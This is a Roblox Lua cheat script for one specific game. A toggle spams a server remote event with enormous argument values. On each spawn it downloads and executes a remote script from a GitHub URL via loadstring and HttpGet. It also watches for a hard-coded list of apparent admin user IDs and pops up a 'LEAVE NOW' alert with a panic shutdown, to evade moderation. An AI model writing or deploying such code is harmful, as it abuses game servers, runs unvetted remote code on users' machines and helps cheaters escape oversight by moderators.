if game.GameId == 4538598064 then
local playerGui = game.Players.LocalPlayer:WaitForChild("PlayerGui")

local screenGui = Instance.new("ScreenGui")
screenGui.IgnoreGuiInset = true
screenGui.Parent = playerGui
screenGui.Name = math.random(1,69420)
screenGui.ResetOnSpawn = false

local spamButton = Instance.new("TextButton")
spamButton.Name = "Spam"
spamButton.Text = "Spam"
spamButton.Size = UDim2.new(0, 75, 0, 55)
spamButton.Position = UDim2.new(0.5,155 , 0.8, -25)
spamButton.Parent = screenGui

local audiobtn = Instance.new("TextButton")
audiobtn.Name = "Audio Fix"
audiobtn.Text = "Fix Audio"
audiobtn.Size = UDim2.new(0, 75, 0, 55)
audiobtn.Position = UDim2.new(0.5, -205, 0.8, -25)
audiobtn.Parent = screenGui

local spamming = false

local function spam()
	while spamming do
for i=1, 3 do
		local args = {
			[1] = 5.520474058077904e+76,
			[2] = 1,
			[3] = 2.933813859058389e+76
		}

		game.ReplicatedStorage.Network_Generated.GeneratedEvent241:FireServer(unpack(args))
end
		task.wait()
	end
end

spamButton.MouseButton1Down:Connect(function()
	spamming = not spamming
	if spamming then
		spamButton.Text = "Stop"
		spawn(spam)
	else
		spamButton.Text = "Spam"
	end
end)
audiobtn.MouseButton1Down:Connect(function()
	for i, v in pairs(game.SoundService.Master.Music.Game:GetChildren()) do
        if not v.Playing then
v.Volume = 1
v.Playing=true
game.SoundService.Master.Music.Lobby.Main:Play()
game.SoundService.Master.Music.Lobby.Main.Volume=1
end
    end
end)
function parry()
loadstring(game:HttpGet("https://raw.githubusercontent.com/ltseverydayyou/uuuuuuu/main/phantom%20ball%20script"))()
end

local function OnCharacterAdded()
	parry()
end

game.Players.LocalPlayer.CharacterAdded:Connect(OnCharacterAdded)
OnCharacterAdded()
end
spawn(function()
local targetPlayers = {
 3171573164,
3397358824,
2813027200,
1586709845,
1310918084,
173176991,
1211512692,
52057148,
618810056,
42754413,
2331341558,
608374,
4516797636,
661080946,
431980546,
1458618509
}

game.Players.PlayerAdded:Connect(function(player)
 for _, targetPlayerId in ipairs(targetPlayers) do
  for _, plr in pairs(game.Players:GetDescendants()) do
   if plr:IsA("Player") and plr.UserId==targetPlayerId then
for i=1, 3 do
local function callback(Text)
 if Text == "Panic" then
game:Shutdown()
 end
end

    local NotificationBindable = Instance.new("BindableFunction")
NotificationBindable.OnInvoke = callback
game.StarterGui:SetCore("SendNotification", {
 Title = "⚠️ ADMIN SPOTTED ⚠️";
 Text = "LEAVE NOW";
 Icon = "";
 Button1 = "Panic";
 Duration = math.huge;
 Callback = NotificationBindable;
})
end
    break
   end
  end
 end
end)
end)
print("loaded v6")
--v6
